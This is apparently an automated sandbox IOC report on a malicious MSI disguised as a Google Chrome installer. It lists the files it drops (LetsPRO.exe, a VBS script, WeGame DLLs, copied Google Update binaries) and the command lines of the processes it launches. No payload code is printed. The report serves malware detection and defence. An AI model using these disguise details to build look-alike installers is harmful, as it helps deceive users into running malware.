IOC Report
sutup-Chrome.13.26.x64.msi

Files

File Path
Type
Category
Malicious
sutup-Chrome.13.26.x64.msi
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 936, Revision Number: {924DFDB4-5E1D-409E-8393-FA9658AA79C4}, Number of Words: 2, Subject: Google Chrome, Author: Google, Name of Creating Application: Google Chrome, Template: ;2052, Comments: Installer Google Chrome , Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Tue Apr 23 15:38:46 2024, Last Saved Time/Date: Tue Apr 23 15:38:46 2024, Last Printed: Tue Apr 23 15:38:46 2024, Number of Pages: 450
initial sample
malicious
C:\Program Files (x86)\ChromeSetup.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcr100.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler64.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdate.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateBroker.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateOnDemand.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdate.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_am.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ar.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bg.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bn.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ca.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_cs.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_da.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_de.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_el.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_en-GB.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_en.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_es-419.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_es.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_et.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fa.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fi.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fil.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fr.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_gu.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hi.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hr.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hu.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_id.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_is.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_it.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_iw.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ja.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_kn.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ko.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_lt.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_lv.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ml.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_mr.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ms.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_nl.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_no.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pl.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pt-BR.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pt-PT.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ro.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ru.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sk.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sl.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sr.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sv.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sw.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ta.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_te.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_th.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_tr.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_uk.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ur.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_vi.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_zh-CN.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_zh-TW.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\psmachine.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\psmachine_64.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\psuser.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\psuser_64.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\WeGame\Lua51.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\WeGame\WeGame.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\WeGame\adapt_for_imports.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\WeGame\beacon_sdk.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Program Files (x86)\WeGame\common.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\99944\1
data
dropped
malicious
C:\Users\user\99944\144977.vbs
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\99944\LetsPRO.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\Installer\MSIB404.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\Installer\MSIB54D.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\Installer\MSIB59C.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\Installer\MSIB5FB.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler64.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateBroker.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateComRegisterShell64.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateCore.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateOnDemand.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateSetup.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdate.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_am.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ar.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bg.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bn.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ca.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_cs.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_da.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_de.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_el.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en-GB.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es-419.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_et.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fa.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fi.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fil.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fr.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_gu.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hi.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hr.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hu.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_id.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_is.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_it.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_iw.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ja.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_kn.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ko.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lt.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lv.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ml.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_mr.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ms.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_nl.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_no.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pl.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-BR.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-PT.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ro.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ru.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sk.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sl.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sr.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sv.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sw.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ta.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_te.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_th.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_tr.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_uk.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ur.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_vi.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-CN.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-TW.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\psmachine.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\psmachine_64.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\psuser.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\psuser_64.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Config.Msi\5bb04c.rbs
data
modified
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\1
data
dropped
C:\Windows\Installer\5bb04a.msi
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 936, Revision Number: {924DFDB4-5E1D-409E-8393-FA9658AA79C4}, Number of Words: 2, Subject: Google Chrome, Author: Google, Name of Creating Application: Google Chrome, Template: ;2052, Comments: Installer Google Chrome , Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Tue Apr 23 15:38:46 2024, Last Saved Time/Date: Tue Apr 23 15:38:46 2024, Last Printed: Tue Apr 23 15:38:46 2024, Number of Pages: 450
dropped
C:\Windows\Installer\MSIB403.tmp
data
dropped
C:\Windows\Installer\SourceHash{26E6D275-3FC7-41A2-B8C2-458B639029D2}
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Installer\inprogressinstallinfo.ipi
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Windows\SystemTemp\GUTBC13.tmp
POSIX tar archive (GNU)
dropped
C:\Windows\Temp\__PSScriptPolicyTest_djfjjprx.ib4.psm1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_g1k0gdit.4vd.ps1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\~DF13444FAED326CFE4.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF2606DFAF92E1788E.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF2C2EEF8CDB43B84F.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF31F011CF3971BA60.TMP
data
dropped
C:\Windows\Temp\~DF465AE04596FEE092.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF5C4DA31D46AF7F16.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF6980B5A144D98980.TMP
data
dropped
C:\Windows\Temp\~DF8203C67729525379.TMP
data
dropped
C:\Windows\Temp\~DF96C0D5871EAB58D2.TMP
data
dropped
C:\Windows\Temp\~DF983CA76AAB82BF40.TMP
data
dropped
C:\Windows\Temp\~DFA13276FCEDE38A2A.TMP
data
dropped
C:\Windows\Temp\~DFAE75FECF180B7D8D.TMP
data
dropped
There are 166 more files that are not shown.

Processes

Path
Cmdline
Malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\ChromeSetup.exe
"C:\Program Files (x86)\ChromeSetup.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
malicious
